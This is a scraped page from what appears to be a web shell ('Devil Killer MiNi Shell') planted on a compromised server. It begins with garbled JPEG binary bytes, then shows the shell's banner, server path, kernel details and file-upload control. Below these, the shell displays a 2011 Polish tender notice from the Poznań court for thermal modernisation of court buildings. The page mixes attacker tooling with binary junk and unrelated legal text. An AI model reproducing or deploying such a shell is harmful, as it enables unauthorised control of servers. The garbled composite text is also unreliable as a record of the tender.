JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111021/347334-N-2011.html

<p class="kh_header"><b>Poznań: Wykonanie prac termomodernizacyjnych budynków Sądów Rejonowych, Prokuratury Rejonowej w Kościanie oraz budynku Sądu Okręgowego, z uprzednim pozyskaniem środków na finansowanie zadania ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej pełniącego rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS)</b><br>
<b>Numer ogłoszenia: 347334 - 2011; data zamieszczenia: 21.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Poznaniu , Al. Marcinkowskiego 32, 61-745 Poznań, woj. wielkopolskie, tel. 61 85 66 004, faks 61 85 66 087.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poznan.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac termomodernizacyjnych budynków Sądów Rejonowych, Prokuratury Rejonowej w Kościanie oraz budynku Sądu Okręgowego, z uprzednim pozyskaniem środków na finansowanie zadania ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej pełniącego rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W przedmiotowym postępowaniu ZAMAWIAJĄCYM JEST: SĄD OKRĘGOWY W POZNANIU z siedzibą w Poznaniu, Al. Marcinkowskiego 32 oraz PROKURATURA OKRĘGOWA W POZNANIU z siedzibą w Poznaniu, ul. Solna 10.
PEŁNOMOCNIKIEM ZAMAWIAJĄCYCH jest SĄD OKRĘGOWY W POZNANIU 61-745 Poznań, Al. Marcinkowskiego 32.


Przedmiotem zamówienia jest:


a) wykonanie robót budowlanych - prac termomodernizacyjnych budynków Sądów Rejonowych, Prokuratury Rejonowej w Kościanie oraz budynku Sądu Okręgowego, z uprzednim pozyskaniem środków na finansowanie zadania ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej pełniącego rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych, a także dokonanie rozliczenia końcowego zadania przed Narodowym Funduszem Ochrony Środowiska i Gospodarki Wodnej w ramach programu GIS.

b) ponadto przedmiotem zamówienia jest wykonanie szeregu prac towarzyszących nie podlegających dotacji.



Przedmiot zamówienia jest realizowany w ramach zadania obejmującego w szczególności: 

1. Podjęcie działań na zlecenie Zamawiającego zmierzających do pozyskania środków finansowych - przygotowanie, opracowanie i złożenie w imieniu Zamawiającego kompletnego wniosku aplikacyjnego wraz z załącznikami (m.in. będącymi w posiadaniu zamawiającego audytami energetycznymi) do Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej pełniącego rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych zakończone uzyskaniem finansowania całości robót budowlanych termomodernizacyjnych objętych przedmiotem niniejszego zamówienia (zgodnie z warunkami i procedurami określonymi przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej).

2. W przypadku uzyskania finansowania całości robót budowlanych termomodernizacyjnych - wykonanie dla budynków użyteczności publicznej niżej oznaczonych robót budowlanych - prace termomodernizacyjne i pozostałe prace remontowe, w szczególności:
Sąd Okręgowy Poznań - budynek przy al. Marcinkowskiego 32 jest elementem zespołu urbanistyczno-architektonicznego centrum miasta Poznania wpisanego do rejestru zabytków pod nr A 231 decyzją z dnia 14.03.1980 r.
-	ocieplenie ścian zewnętrznych budynku w systemie BSO, wełną mineralną,
-	ocieplenie stropu pod prześwitem wełną mineralną,
-	ocieplenie stropodachu wełną mineralną granulowaną lub granulatem celulozowym, 
-	ocieplenie stropu nad garażem styropianem,
-	wymiana stolarki okiennej na drewnianą, 
-	wymiana drzwi zewnętrznych w  elewacjach zewnętrznych północnej i  południowej z powiększeniem otworów drzwiowych
-	wykonanie prac renowacyjnych elewacji w obrębie cokołu budynku, oraz części przyziemia, 
-	wymiana fasad szklanych na profilach stalowych w elewacjach wewnętrznych północnej i południowej,
-	wymiana luksferów i wypełnień z poliwęglanów w elewacjach zewnętrznych północnej i południowej, 
-	wykonanie prac wykończeniowych na elewacjach - całkowite odtworzenie wszystkich detali i elementów elewacji.

Sąd Rejonowy Gniezno -budynek znajduje się na terenie historycznego założenia urbanistycznego 
ocieplenie ścian piwnic poniżej poziomu gruntu styropianem ekstrudowanym,
- ocieplenie ścian zewnętrznych kondygnacji naziemnych w systemie BSO styropianem,
- ocieplenie stropu przed ostatnią kondygnacją,
- osuszenie budynku metodą bezinwazyjną,
- wykonanie prac wykończeniowych na elewacjach



Sąd Rejonowy Gostyń - budynek znajduje się na terenie historycznego założenia urbanistycznego miasta Gostynia, uznanego za zabytek na podstawie prawomocnej decyzji Wojewódzkiego Konserwatora Zabytków
-	ocieplenie ścian zewnętrznych części starszej budynku w elewacjach bocznej i tylnej w systemie BSO styropianem,
-	ocieplenie ścian zewnętrznych części nowszej budynku kondygnacji naziemnych w systemie BSO styropianem,
-	ocieplenie dachu w części użytkowej,
-	ocieplenie stropu ostatniej kondygnacji w części nieużytkowanego poddasza,
-	wykonanie prac renowacyjnych elewacji frontowej i bocznej ul. Sądowej 1
-	wykonanie prac wykończeniowych na elewacjach,
-	demontaż istniejących opraw oświetleniowych,
-	montaż z podłączeniem nowych opraw oświetleniowych.

Sąd Rejonowy Kościan oraz Prokuratura Rejonowa w Kościanie - budynek znajduje się w granicach założenia urbanistycznego miasta Kościana wpisanego do rejestru zabytków na podstawie Decyzji konserwatorskiej z dnia 1.02.1956 r. pod numerem 119/541/A
-	ocieplenie ścian zewnętrznych kondygnacji naziemnych w systemie BSO styropianem,
-	ocieplenie stropu ostatniej kondygnacji wełną mineralną,
-	wymiana stolarki okiennej na drewnianą,
-	wykonanie prac renowacyjnych cokołu ceglanego,
-	wykonanie prac wykończeniowych na elewacjach,
-	demontaż istniejących opraw oświetleniowych,
-	montaż z podłączeniem nowych opraw oświetleniowych.


Sąd Rejonowy Trzcianka ul. Staszica 1 i 3 - budynki znajdują się w Ewidencji Wielkopolskiego Wojewódzkiego Konserwatora Zabytków
-	ocieplenie ścian zewnętrznych kondygnacji naziemnych w systemie BSO styropianem,
-	ocieplenie ścian piwnic w strefie cokołowej styropianem ekstrudowanym,
-	ocieplenie dachu wełną mineralną,
-	wykonanie prac wykończeniowych na elewacjach oraz na poddaszu,
-	demontaż istniejących opraw oświetleniowych,
-	montaż z podłączeniem nowych opraw oświetleniowych.


Sąd Rejonowy Wolsztyn - budynek znajduje się poza terenem wpisanym do rejestru zabytków. 
-	ocieplenie ścian zewnętrznych kondygnacji naziemnych w systemie BSO, styropianem,
- ocieplenie stropu ostatniej kondygnacji wełną mineralną,
- wykonanie prac renowacyjnych cokołu ceglanego,
- wykonanie prac wykończeniowych na elewacjach.

3. Wykonanie dokumentacji powykonawczej: w formie papierowej, elektronicznej i fotograficznej  - w ilości 4 egz.
4. Przeprowadzenie w imieniu Zamawiającego kompleksowego rozliczenia zadania objętego bezzwrotną dotacją z Narodowym Funduszem Ochrony Środowiska i Gospodarki Wodnej pełniącym rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych (na warunkach i zasadach  oraz z zastosowaniem procedur określonych przez NFOŚiGW).

5. Wszelkie roboty budowlane stanowiące przedmiot zamówienia będą mogły być wykonywane wyłącznie w przypadku uprzedniego uzyskania finansowania robót budowlanych termomodernizacyjnych z Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej pełniącego rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych.

6. Prace objęte zamówieniem muszą być prowadzone i wykonane zgodnie z specyfikacją istotnych warunków zamówienia, w tym dokumentacją projektową i techniczną stanowiącą integralną cześć specyfikacji istotnych warunków zamówienia, a także zgodnie z warunkami finansowania inwestycji w ramach programu oznaczonego w pkt. 1. Wykonawca zobowiązuje się do wykonania wszystkich prac będących przedmiotem umowy z należytą starannością, zgodnie z aktualnym w czasie wykonania przedmiotu zamówienia poziomem wiedzy technicznej i organizacyjnej oraz obowiązującymi na terenie Polski normami i przepisami prawa. Termin realizacji przedmiotu zamówienia publicznego: 1) część przedmiotu zamówienia publicznego oznaczona w pkt. 1: w nieprzekraczalnym terminie przewidzianym do składania kompletnego wniosku aplikacyjnego wraz z załącznikami do Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej pełniącego rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych ; 2) część przedmiotu zamówienia publicznego oznaczona w pkt. 2, 3, 4 pod warunkiem uzyskania finansowania robót termomodernizacyjnych w terminie określonym w umowie o finansowanie robót termomodernizacyjnych zawartej pomiędzy Zamawiającym a Narodowym Funduszem Ochrony Środowiska i Gospodarki Wodnej na finansowanie projektu objętego niniejszym zamówieniem publicznym jednak nie później niż do 30 kwietnia 2014 roku. Wykonawcy są uprawnieni przed złożeniem wniosku o dopuszczenie do udziału w postępowaniu do odbycia wizji lokalnej obiektów Zamawiającego w celu zapoznania się z obiektami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 20% wartości zamówienia podstawowego, zgodnie z art. 67 ust 1 pkt 6 ustawy - Prawo zamówień publicznych. Zamówienie uzupełniające zostanie udzielone na podstawie odrębnej umowy lub umów zawartych z Wykonawcą w trybie zamówienia z wolnej ręki. Zamówienie uzupełniające będzie polegało na powtórzeniu tego samego rodzaju zamówienia co zamówienie podstawowe tj. wykonywaniu robót budowlanych dla przedmiotowego zadania. Ilość robót budowlanych zleconych w ramach zamówienia uzupełniającego będzie uzależniona od bieżących potrzeb Zamawiającego w ramach wartości stanowiącej nie więcej niż 20% zamówienia podstawowego. Zamówienie może być udzielone w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy, również w trakcie realizacji zamówienia podstawowego jeśli zajdzie taka konieczność</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.61.12-2, 45.45.30.00-7, 45.40.00.00-1, 45.31.00.00-3, 71.24.10.00-9, 71.24.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający będzie wymagał wniesienia wadium w wysokości 191.000,00 zł. Wadium wnosi się przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak opisu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie: wykonał zamówienie obejmujące roboty termomodernizacyjne polegające na dociepleniu ścian zewnętrznych budynku lub budynków, o powierzchni docieplenia każdorazowo w ramach jednego zamówienia co najmniej 10.000 m.kw. co najmniej 3 zamówienia, w tym co najmniej jedno zamówienie w ramach którego co najmniej jeden budynek, w którym wykonywano prace termomodernizacyjne znajdował się na terenie strefy ochrony konserwatorskiej ustanowionej na podstawie art. 19 ust. 3 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz.U. nr 162, poz. 1568 z późn. zm.) 2) Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie: wykonał usługę polegającą na przygotowaniu, opracowaniu i złożeniu wniosku aplikacyjnego do Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej pełniącego rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS), zakończoną uzyskaniem finansowania całości robót budowlanych termomodernizacyjnych objętych wnioskiem co najmniej 2 zamówienia, w tym co najmniej jedno zamówienie zakończone przyznaniem finansowania w ramach programu GIS na roboty termomodernizacyjne z uwzględnieniem zainstalowania oświetlenia energooszczędnego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak opisu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje osobami które będą uczestniczyć w wykonywaniu zamówienia tj: 1) kierownika budowy, posiadającego uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjnobudowlanej bez ograniczeń, wydane na podstawie aktualnie obowiązujących przepisów ustawy Prawo budowlane lub ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów, upoważniające do kierowania robotami konstrukcyjnobudowlanymi objętymi przedmiotowym zamówieniem oraz minimum 5letni staż pracy na stanowisku kierownika budowy oraz spełniającego warunki określone w par. 8 ust. 1 i 2 Rozporządzenia ministra kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. Nr 150 poz. 1579 z późn. zm.); 2) kierownika robót elektrycznych, posiadającego uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń wydane na podstawie aktualnie obowiązujących przepisów ustawy Prawo budowlane lub ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów, upoważniające do kierowania robotami elektrycznymi objętymi przedmiotowym zamówieniem oraz minimum 3letni staż pracy na stanowisku kierownika budowy lub robót elektrycznych; 3) co najmniej jedną osobą do kierowania zespołem przygotowującym wniosek o uzyskanie finansowania z Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej pełniącego rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS) Zarządzanie energią w budynkach wybranych podmiotów sektora finansów publicznych zakończone uzyskaniem finansowania całości robót budowlanych termomodernizacyjnych, która w ostatnich 3 latach poprzedzających termin do złożenia wniosku o dopuszczenie do udziału w postępowaniu uczestniczyła w co najmniej 3 zamówieniach obejmujących podjęcie działań na zlecenie zamawiającego do pozyskania finansowania z Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej pełniącego rolę Krajowego Operatora Systemu Zielonych Inwestycji w ramach programu System Zielonych Inwestycji (GIS), zakończonych uzyskaniem finansowania na całość kwot objętych wnioskiem o dofinansowanie. Osoby wskazane w pkt. 1-3 do kierowania poszczególnymi robotami nie mogą łączyć funkcji (wykonawca jest zobowiązany do każdego z ww. punktów wskazać inną osobę). 4) średnioroczne zatrudnienie u Wykonawcy składającego wniosek o dopuszczenie do udziału w postępowaniu w ciągu ostatnich trzech lat kalendarzowych (2008,2009,2010), a jeżeli okres prowadzenia działalności jest krótszy w tym okresie było nie mniejsze niż 60 pracowników;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) wykonawca wykaże średnie roczne przychody netto ze sprzedaży w wysokości nie mniejszej niż 5.000.000,00 PLN w okresie ostatnich 3 lat obrotowych (tj. lat 2008, 2009, 2010), a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, 2) wykonawca posiada aktualne ubezpieczenie odpowiedzialności cywilnej prowadzonej działalności gospodarczej obejmującej działalność polegającą na wykonywaniu robót budowlanych o sumie ubezpieczenia nie mniejszej niż 4.000.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

